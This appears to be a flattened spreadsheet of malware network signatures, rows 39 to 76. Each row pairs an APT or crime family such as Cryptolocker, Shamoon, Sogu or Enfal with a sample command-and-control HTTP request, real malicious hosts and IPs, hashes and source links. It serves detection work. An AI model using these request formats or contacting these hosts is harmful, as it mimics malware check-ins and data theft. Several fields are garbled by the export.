4/28/2013APTCookies /Cookiebag / DalbotGET /8223.asp HTTP/1.1 (also can be like /2007.asp,/2013.asp etcGET /8223.asp HTTP/1.1
Accept: /
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: 1.234.1.68
Connection: Keep-Alive
Cookie: CAQGBgoFD1YaHA4ZH1AIBwIOBR8ADhJWU1pcXlADBBgfBQoGDlYDCgUeDgcORgkIXVtcWVtQ
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)http://contagioexchange.blogspot.com/2013/08/cookies-cookiebag-dalbot-strings-apt-2.html http://contagioexchange.blogspot.com/2013/08/cookies-cookiebag-dalbot-strings-apt-1.html9b6692295fadf24b512d5f63e4f74d15http://bit.ly/aptpcaps2012-10http://labs.alienvault.com/labs/index.php/2012/unveiling-a-spearphishing-campaign-and-possible-ramifications/
39
4/28/2013APTCookies /Cookiebag / DalbotGET /indexs.zip HTTP/1.1GET /indexs.zip HTTP/1.1
Accept: /
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: 117.55.241.58
Connection: Keep-Alive
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)http://contagioexchange.blogspot.com/2013/08/cookies-cookiebag-dalbot-strings-apt-2.html http://contagioexchange.blogspot.com/2013/08/cookies-cookiebag-dalbot-strings-apt-1.html840BD11343D140916F45223BA05ABACBhttp://bit.ly/aptpcaps2012-01http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html
40
4/28/2013APTCoswidGET /old/google.png HTTP/1.1GET /old/google.png HTTP/1.1
Accept: . . . . . ,
User-Agent: [redacted] fcfea+Mozilla/4.0 (compatible; MSIE 8.0; win32)
Host: firstwillnessclub.com
[redacted] fcfea+Mozilla/4.0 (compatible; MSIE 8.0; win32)http://contagioexchange.blogspot.com/2013/08/coswid-strings-apt.html726ef24b8eff4c4121c73861756fb9a3
a4ba6540520c375875bf46cf8e19cb7d
09fd067b6d944bf111857f6f60b7471e
2012-05http://labs.alienvault.com/labs/index.php/category/blog/snort-blog/page/2/
41
10/15/2013 17:04:08CRIMECryptolockerPOST /home/ HTTP/1.1POST /home/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: rwyngtbvunfpk.org
Content-Length: 192
Connection: Close
crypt_1_sell23-09.exe_User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)http://contagioexchange.blogspot.com/2013/10/cryptolocker-strings-crime.html9cbb128e8211a7cd00729c159815cb1chttp://bit.ly/crimesampleshttp://bit.ly/crimepcaps2013-10-14http://nakedsecurity.sophos.com/2013/10/12/destructive-malware-cryptolocker-on-the-loose/
42
5/16/2013CrimeCutwail / PushdoPOST /?ptrxcz_VYadfikmqsuxz2469BEGILNPSUXZbe HTTP/1.1POST /?ptrxcz_VYadfikmqsuxz2469BEGILNPSUXZbe HTTP/1.1
Accept: /
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 193
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: uakron.edu
Connection: Keep-Alive
Cache-Control: no-cache

g.P#...#...#...$..5$...$...$7S.$^.3%xQf%...%.O.%...&.Md&...&;L.&U..'o.H'...'...'...(..F(..
.2..(O..(.
........\+..p,.z...u)t.?>.-.p'+.<Z+.n.+.:.+...,.9X, ..,G7.,a.
-{.<-...-...-......:...m.>
Also can use xclzve instead of ptrxczUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Unicode appid\{27af75ed-20d9-11d1-b1ce-00805fc1270e}582de032477e099eb1024d84c73e98c1http://bit.ly/crimesampleshttp://bit.ly/crimepcaps2013-05https://www.damballa.com/downloads/r_pubs/Damballa_mv20_case_study.pdf
43
4/28/2013APTCVE-2012-0754 SWF in DOCGET /test.mp4 HTTP/1.1GET /test.mp4 HTTP/1.1
Accept: /
Accept-Language: en-US
x-flash-version: 11,1,102,55
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)
Host: 208.115.230.76
Connection: Keep-Alive
SWF request Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)E92A4FC283EB2802AD6D0E24C7FCC8572012-05http://contagiodump.blogspot.com/2012/03/mar-2-cve-2012-0754-irans-oil-and.html
44
4/28/2013APTCVE-2012-0779GET /essais.swf?info=789c333230d13331d53337d633b3b432313106001afa0338&infosize=00FC0000 HTTP/1.1GET /essais.swf?info=789c333230d13331d53337d633b3b432313106001afa0338&infosize=00FC0000 HTTP/1.1
Accept: /
User-Agent: contype
Host: 204.45.73.69
contype1750A38A44151493B675538A1AC2070B2012-05http://contagiodump.blogspot.com/2012/05/may-3-cve-2012-0779-world-uyghur.html
45
9/8/2013 21:03:58APTDarkcometGET /a.php?id=c2ViYWxpQGxpYmVyby5pdA== HTTP/1.1GET /a.php?id=c2ViYWxpQGxpYmVyby5pdA== HTTP/1.1
Host: [ip.address]
nonehttp://contagioexchange.blogspot.com/2013/09/dark-comet-strings-apt.htmldc98abba995771480aecf4769a88756e http://bit.ly/aptsampleshttp://bit.ly/aptpcaps2013-09-08http://www.contextis.com/research/blog/malware-analysis-dark-comet-rat/
46
4/28/2013CrimeDarkmegiGET /20111230.jpg HTTP/1.1GET /20111230.jpg HTTP/1.1
Host: images.hananren.com
User-Agent: Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1;+.NET+CLR+2.0.50727)
Cache-Control: no-cache
Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1;+.NET+CLR+2.0.50727)6C8F9658A390C24A9F4551DC150639272012-04http://contagiodump.blogspot.com/2012/04/this-is-darkmegie-rootkit-sample-kindly.html
47
4/28/2013CrimeDarkness DDos v8gGET /index.php?uid=587609&ver=8g%20XP HTTP/1.0GET /index.php?uid=587609&ver=8g%20XP HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Host: vkotalke.info
Pragma: no-cache
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)F03Bc8Dcc090607F38Ffb3A36Ccacf48http://bit.ly/crimepcaps2011-01http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html
48
4/28/2013APTDepyotGET /new/3d/d/pdf .php?id=2 HTTP/1. 1GET /new/3d/d/pdf .php?id=2 HTTP/1. 1
User-Agent: Mozilla/4.0 (compatible)
Host: www.3dvideo. ru
Cache-Control: no-cache
stage 1 payload Mozilla/4.0 (compatible)651fad35d276e5dedc56dfe7f3b5f1252013-03http://www.fireeye.com/blog/technical/targeted-attack/2013/03/internet-explorer-8-exploit-found-in-watering-hole-campaign-targeting-chinese-dissidents.html
49
4/28/2013APTDestory Rat / Sogu / Thoper POST /update?id=3109c2a2 HTTP/1.1POST /update?id=3109c2a2 HTTP/1.1
Accept: /
X-Session: 0
X-Status: 0
X-Size: 61456
X-Sn: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1;)
Host: path.alyac.org
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
Both variants are associated with the Destory
RAT family of malware that dates back at least as far
as January 2007
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1;2012-02http://www.commandfive.com/papers/C5_APT_C2InTheFifthDomain.pdf
50
4/28/2013APTDestory Rat / Sogu / Thoper POST /update?product=windows HTTP/1.1POST /update?product=windows HTTP/1.1
Accept: /
X-Session: 0
X-Status: 0
X-Size: 61456
X-Sn: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1;
Update communications The format of Variant A is identical to the
communications generated by the Destory RAT used
in the SK Communications hack http://www.commandfive.com/papers/C5_APT_SKHack.pdf
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1;2012-02http://www.commandfive.com/papers/C5_APT_C2InTheFifthDomain.pdf
51
5/1/2013APTDestory Rat / Sogu / Thoper POST /update?id= 000f72b8 HTTP/1. 1POST /update?id= 000f72b8 HTTP/1. 1
Accept: /
X-Session: 0..X- Status: 0
X-Siz e: 61456
X-Sn: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0 ; Windows NT 5.1 ; .NET CLR 2.0.5 0727; SV1)
Host : localhost
Content-Length: 0
Connection: Keep -Alive
Cache-Control: no-cache.
Mozilla/4.0 (compatible; MSIE 6.0 ; Windows NT 5.1 ; .NET CLR 2.0.5 0727; SV1)GETPASSWORD1
RarSFX
Svchost.exePK
Presetup=c:\windows\
Silent=1

Unicode
Shell.Explorer
about:blank
ASKNEXTVOL
2385B332637DD37E4E5C79A1FED46171http://bit.ly/aptsamples4/18/2013http://www.threatexpert.com/report.aspx?md5=2385b332637dd37e4e5c79a1fed46171
52
4/28/2013APTDestory Rat / Sogu / Thoper (Alienvault lists it as PlugX RAT ver NvSmartMax.dll variant but it matches Destory Rat / Sogu / Thoper ) http://www.commandfive.com/papers/C5_APT_C2InTheFifthDomain.pdf pg.6POST /update?id=000f6b50 HTTP/1.1POST /update?id=000f6b50 HTTP/1.1
Accept: /
X-Session: 0
X-Status: 0
X-Size: 61456
X-Sn: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1; .NET CLR 1.1.4322; .NET CLR1.0.3705)
Host: exchange.likescandy.com
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1; .NET CLR 09B8B54F78A10C435CD319070AA13C282012-09http://labs.alienvault.com/labs/index.php/2012/the-connection-between-the-plugx-chinese-gang-and-the-latest-internet-explorer-zeroday/
53
4/28/2013CrimeDirtJumper DDoSPOST /678/index.phpPOST /678/index.php HTTP/1.0
Host: asdaddddaaaa.com
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US)
Content-Type: application/x-www-form-urlencoded
Content-Length: 17

k=426924814555748
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US)2011-10http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html
54
4/28/2013CrimeDirtjumper ddosPOST /boi854tr4w.php HTTP/1.0POST /boi854tr4w.php HTTP/1.0
Host: coppercreek.ru
Accept: /
Accept-Encoding: identity, ;q=0
Content-Length: 269
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)2012-08http://blog.shadowserver.org/page/3/
55
5/1/2013APT2Disttrack / ShamoonGET /ajax_modal/modal/data.asp?mydata=AA==&uid=aaa.bbb.ccc.ddd&state=3067203 HTTP/1.0GET /ajax_modal/modal/data.asp?mydata=AA==&uid=aaa.bbb.ccc.ddd&state=3067203 HTTP/1.0
User-Agent: you
youD214C717A357FE3A455610B197C390AA
B14299FD4D1CBFB4CC7486D978398214
http://bit.ly/aptsamples2012-08http://vrt-blog.snort.org/2012/08/new-threat-disttrack.html
56
4/28/2013CrimeDNSChangerPOST /d56sc1d56scd56sc1.php?ini=v22Mmjy0SYXyWTI0tQ0QQOdqOb68J9I6ModWQnN1eE1VXw/T3BWOyTujBlrHIQqMgMqV750QegiBMF4XAHPzbYqRtufQpaX/M/trvO7ukg== HTTP/1.1POST /d56sc1d56scd56sc1.php?ini=v22Mmjy0SYXyWTI0tQ0QQOdqOb68J9I6ModWQnN1eE1VXw/T3BWOyTujBlrHIQqMgMqV750QegiBMF4XAHPzbYqRtufQpaX/M/trvO7ukg== HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: borderspot.net
User-Agent: Mozilla/6.0 (Windows; wget 3.0)
Content-Length: 193
Connection: close
Cache-Control: no-cache

data=qSrTzGL0RMCyDnY9+xJEQe5nNLundsMqfdgBGzUoJ0xVTU/DzQWC3DLbXB/UfETT1o6F2ZIbLEGVJ0MOJTSDP9PX4aSS/OagY6143bGp0y/uGVSLVL0u+uo+x5NraqI7DJaKGg7TCqXkTszGInUBxiK1/hKL2oFYpjsSeY04x+zt2a9dO+UI5VhP0W45
Mozilla/6.0 (Windows; wget 3.0)http://bit.ly/crimepcaps2011-12http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html
57
4/28/2013APTDNSWatch / ProtuxGET /dns/dnslookup?la=en&host=picture.ucparlnet.com&type=A&submit=Resolve HTTP/1.12011-05
GET /dns/dnslookup?la=en&host=picture.ucparlnet.com&type=A&submit=Resolve HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 6.0.1; WININET 5.0)
Host: www.dnswatch.info
Cache-Control: no-cache

2012-11
GET /dns/dnslookup?la=en&host=vcvcvcvc.dyndns.org&type=A&submit=Resolve HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 6.0.1; WININET 5.0)
Host: www.dnswatch.info
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (compatible; MSIE 6.0.1; WININET 5.0)
The Trojan first tries to resolve its hostnames indirectly by sending the following type of request to www.dnswatch.info over TCP port 80:Mozilla/5.0 (compatible; MSIE 6.0.1; WININET 5.0)\Program Files\xerox\
Find fuck process.%s
it.dat
jqda///dfy
gzqu
tdfeedt.
\hon
hongzinst
~Thumbddb.tmp
OpenKeyEx Failed.%s,Error:%d
06ddf39bc4b5c7a8950f1e8d11c44446
2012
D4C6CD7276019CB861286ECC6B0525BE (rtf dropper)
4F8A44EF66384CCFAB737C8D7ADB4BB8

http://bit.ly/aptsampleshttp://bit.ly/aptpcaps2011-05http://www.cyberengineeringservices.com/ladens-death-doc-cve-2010-3333/
http://doc.emergingthreats.net/bin/view/Main/2014359
58
4/28/2013APTDNSWatch / ProtuxGET /news.jpg HTTP/1.1GET /news.jpg HTTP/1.1
Accept: /
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E)
Host: checkerror.ucparlnet.com
Connection: Keep-Alive
The Trojan sends this type of request to checkerror.ucparlnet.com (this DNS query is done normally):Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E)\Program Files\xerox\
Find fuck process.%s
it.dat
jqda///dfy
gzqu
tdfeedt.
\hon
hongzinst
~Thumbddb.tmp
OpenKeyEx Failed.%s,Error:%d
06ddf39bc4b5c7a8950f1e8d11c44446
2012
D4C6CD7276019CB861286ECC6B0525BE (rtf dropper)
4F8A44EF66384CCFAB737C8D7ADB4BB8
http://bit.ly/aptsampleshttp://bit.ly/aptpcaps2011-05http://www.cyberengineeringservices.com/ladens-death-doc-cve-2010-3333/
http://doc.emergingthreats.net/bin/view/Main/2014359
59
4/28/2013APTDNSWatch / ProtuxPOST http://ssi.ucparlnet.com:80/PHqgHumeay5705.mp3 HTTP/1.12011-05
POST http://ssi.ucparlnet.com:80/PHqgHumeay5705.mp3 HTTP/1.1
User-Agent: Mozilla/4.8.20 (compatible; MSIE 5.0.2; Win32)
Host: ssi.ucparlnet.com
Content-Length: 39
Proxy-Connection: keep-alive
Pragma: no-cache

2012-11
POST http://vcvcvcvc.dyndns.org:8080/index.pl ?id=21378 HTTP/1.1
User-Agent: Mozilla/4.8.20 (compatible; MSIE 5.0.2; Win32)
Content-Type: multipart/form-data; boundary=----------2B9250BB47EE537B
Host: vcvcvcvc.dyndns.org
Content-Length: 272
Proxy-Connection: keep-alive
Pragma: no-cache
User-Agent: Mozilla/4.8.20 (compatible; MSIE 5.0.2; Win32)
Host: ssi.ucparlnet.com
Content-Length: 39
Proxy-Connection: keep-alive
Pragma: no-cache
It sent the following types of request to ssi.ucparlnet.com over TCP port 80 and picture.ucparlnet.com over TCP port 443 (NOT SSL):Mozilla/4.8.20 (compatible; MSIE 5.0.2; Win32)\Program Files\xerox\
Find fuck process.%s
it.dat
jqda///dfy
gzqu
tdfeedt.
\hon
hongzinst
~Thumbddb.tmp
OpenKeyEx Failed.%s,Error:%d
06ddf39bc4b5c7a8950f1e8d11c44446
2012
D4C6CD7276019CB861286ECC6B0525BE (rtf dropper)
4F8A44EF66384CCFAB737C8D7ADB4BB8
http://bit.ly/aptsampleshttp://bit.ly/aptpcaps2011-05http://www.cyberengineeringservices.com/ladens-death-doc-cve-2010-3333/
http://doc.emergingthreats.net/bin/view/Main/2014359
60
4/28/2013APTDownloader BMPGET /images/evil.bmp HTTP/1.1GET /images/evil.bmp HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0 ;Windows NT 6.1; U.S. ) 4IRh2K1I3Zl=O
Host: www.badsite4you.com
Cache-Control: no-cache
See the article: The data in red is hard coded into the sample’s binary. The data that is highlighted in yellow is the encoded host name (in this example: victim).
Original Encoded String - 4IRh2K1I3Zl
Decoded String - D+LJDbLR
Letters Switched - R+LJDbLD
Decoded String - victim
Mozilla/4.0 (compatible; MSIE 8.0 ;Windows NT 6.1; U.S. )d166a59e71535a42267e9fa993ca8e7e2012-05http://www.cyberengineeringservices.com/downloader-bmp/
61
4/28/2013APTEinsteinGET / gttfi.php?id=019451425260376469&ext=YmFkc3R1ZmYuZGxs HTTP/1.1GET / gttfi.php?id=019451425260376469&ext=YmFkc3R1ZmYuZGxs HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: family.mobwork.net
Connection: Keep-Alive
Cache-Control: no-cache
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)1c2dfd36ad8cad978a0859d459f103262011-08http://www.cyberengineeringservices.com/trojan-matryoshka-and-trojan-einstein/
62
4/28/2013APTEinstein data sendPOST / gttfi.php?id=019451425260376469&ext=ixioJXXJFCRrrDatKHhK HTTP/1.1POST / gttfi.php?id=019451425260376469&ext=ixioJXXJFCRrrDatKHhK HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: family.mobwork.net
Content-Length: 420
Connection: Keep-Alive
Cache-Control: no-cache
send filename if existsMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)1c2dfd36ad8cad978a0859d459f103262011-08http://www.cyberengineeringservices.com/trojan-matryoshka-and-trojan-einstein/
63
4/28/2013Crime EKEK - Blackhole 2 landingGET /news/default-php-version.php?mdm=30:1g:2v:1f:1o&xguc=3b:3i:39:35&nze=1l:1f:30:1l:2v:30:1m:2v:1n:30&bhn=lixvdd HTTP/1.1GET /news/default-php-version.php?mdm=30:1g:2v:1f:1o&xguc=3b:3i:39:35&nze=1l:1f:30:1l:2v:30:1m:2v:1n:30&bhn=lixvdd HTTP/1.1
Accept: /
Accept-Language: en-US
Referer: http://autorepairgreeley.info/news/default-php-version.php
x-flash-version: 10,1,53,64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: autorepairgreeley.info
Connection: Keep-Alive
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)http://bit.ly/crimepcaps7/27/2013http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html
64
4/28/2013Crime EKEK Blackhole 1GET /showthread.php?t=d7ad916d1c0396ff HTTP/1.1GET /showthread.php?t=d7ad916d1c0396ff HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, /
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)
Host: 88.85.99.44:8080
Connection: Keep-Alive
8080Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)http://bit.ly/crimepcaps2012-03http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html
65
4/28/2013Crime EKEK PhoenixGET /navigator/jueoaritjuir.php HTTP/1.1GET /navigator/jueoaritjuir.php HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, /
Accept-Language: ru
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: 78.83.233.242:8080
Connection: Keep-Alive
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)2012-04http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html
66
8/13/2013CrimeEK PopadsGET /?7d456d68729292e9843cb9dde2d2f7b4=34 HTTP/1.GET /?7d456d68729292e9843cb9dde2d2f7b4=34 HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/xaml+xml, application/vnd.ms-xpsdocument, application/x-ms-xbap, application/x-ms-application, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://creditforums.com/discover-card/2648-why-so-hard-get-approved-discover-card.html
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDR; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: xrp.8taglik.info
Connection: Keep-Alive
some payload TTF:CVE-2011-3402 8b0c74e2c558d604b5443c7ad8c3aeb6.eot
CVE-2013-0422 ccfabd9cd566790d989e29958485c8c2
http://bit.ly/crimesamples2013-08http://www.malwaresigs.com/2013/03/26/popads-exploit-kit/
67
8/13/2013CrimeEK PopadsGET /4d23ccceb2cf9e6c1c91df06170259d3/32cdad27bdec4a68d8efc9bb835008e6.swf HTTP/1.1GET /4d23ccceb2cf9e6c1c91df06170259d3/32cdad27bdec4a68d8efc9bb835008e6.swf HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://qkvuz.12taglik.info/?82f98f39d50070ac6bccd765eb93b37e=y15&8d97baff25493bce238a6ac40dbd2dc1=perfectboys.org
x-flash-version: 11,7,700,202
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Host: qkvuz.12taglik.info
Connection: Keep-Alive
some payload TTF:CVE-2011-3402 8b0c74e2c558d604b5443c7ad8c3aeb6.eot
CVE-2013-0422 ccfabd9cd566790d989e29958485c8c2
http://bit.ly/crimesamples2013-08http://www.malwaresigs.com/2013/03/26/popads-exploit-kit/
68
8/13/2013CrimeEK PopadsGET /855feed4acbb99c63ad7f25fef289284/decaff5b6ee641742f53d8ef8c6f9a16.jar HTTP/1.1GET /855feed4acbb99c63ad7f25fef289284/decaff5b6ee641742f53d8ef8c6f9a16.jar HTTP/1.1
content-type: application/x-java-archive
accept-encoding: pack200-gzip,gzip
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.7.0_07
Host: fizv.11taglik.info
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive

some payload TTF:CVE-2011-3402 8b0c74e2c558d604b5443c7ad8c3aeb6.eot
CVE-2013-0422 ccfabd9cd566790d989e29958485c8c2
http://bit.ly/crimesamples2013-08http://www.malwaresigs.com/2013/03/26/popads-exploit-kit/
69
8/13/2013CrimeEK PopadsGET /?c480cfaa684e1dc0db1b2e1f891d814a=a15&8524421677ca0f8c20fd1cd2c1c6e0a7=sansit.in HTTP/1.1GET /?c480cfaa684e1dc0db1b2e1f891d814a=a15&8524421677ca0f8c20fd1cd2c1c6e0a7=sansit.in HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: tqhsy.8taglik.info
Connection: Keep-Alive
some payload TTF:CVE-2011-3402 8b0c74e2c558d604b5443c7ad8c3aeb6.eot
CVE-2013-0422 ccfabd9cd566790d989e29958485c8c2
http://bit.ly/crimesamples2013-08http://www.malwaresigs.com/2013/03/26/popads-exploit-kit/
70
8/13/2013CrimeEK PopadsGET /39ff9ff8c3b603d8eed017df64dd2799.eot HTTP/1.1GET /39ff9ff8c3b603d8eed017df64dd2799.eot HTTP/1.1
Accept: */*
Referer: http://fizv.11taglik.info/?0090c763e668fab7bbb1c5576207655f=q10&c561f8448a523af56b17eb9ac7ad7a58=sansit.in
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET4.0C; .NET4.0E; InfoPath.3)
Accept-Encoding: gzip, deflate
Host: fizv.11taglik.info
Connection: Keep-Alive
TTF:CVE-2011-3402 8b0c74e2c558d604b5443c7ad8c3aeb6.eothttp://bit.ly/crimesamples2013-08http://www.malwaresigs.com/2013/03/26/popads-exploit-kit/
71
4/28/2013APTEnfal / LuridGET /oi2c/wlc3/ [reducted]:00-00-00-00-00-00/ij83d HTTP/1.1GET /oi2c/wlc3/ [redacted]:00-00-00-00-00-00/ij83d HTTP/1.1
Host: home. coffeeibus . corn
Cache-Control: no-cache
New Enfal checks if
commands have been specified
http://bit.ly/aptpcaps2012http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-detecting-apt-activity-with-network-traffic-analysis.pdf
72
4/28/2013APTEnfal / LuridGET /trandocs/nm/.[reducted] :00-00-00-00-00-00lCrrrwhite HTTP/1.1GET /trandocs/nm/.[redacted] :00-00-00-00-00-00lCrrrwhite HTTP/1.1
Host: note.webmail-temp.com
Cache-Control: no-cache
Enfal checks if commands have
been specified
http://bit.ly/aptpcaps2012http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-detecting-apt-activity-with-network-traffic-analysis.pdf
73
4/28/2013APTEnfal / LuridPOST /cgi-bin/CMS_SubitAll.cgi HTTP/1 .1POST /cgi-bin/CMS_SubitAll.cgi HTTP/1 .1
Host: virustotel.3-a.net
Content-Length: 115
Cache-Control: no-cache
New EnfalPOSTs the
victim’s details to the C&C server
http://bit.ly/aptpcaps2012http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-detecting-apt-activity-with-network-traffic-analysis.pdf
74
4/28/2013APTEnfal / LuridPOST /cgl-bin/Owpq4.cgi HTTP/1.1POST /cgl-bin/Owpq4.cgi HTTP/1.1
Host: note.webmail-temp.com
Content-Length: 83
Cache-Control: no-cache
posts the victim’s details to
the C&C server
http://bit.ly/aptpcaps2012http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-detecting-apt-activity-with-network-traffic-analysis.pdf
75
4/28/2013APTEnfal / LuridPOST /Sjwpc/odw3ux HTTP/1.1POST /Sjwpc/odw3ux HTTP/1.1
Host: hone.coffeeibus.com
Content-length: 104
Cache-Control: no-cache
Original EnfalPOSTs the
victim’s details to the C&C server
http://bit.ly/aptpcaps2012http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-detecting-apt-activity-with-network-traffic-analysis.pdf
76
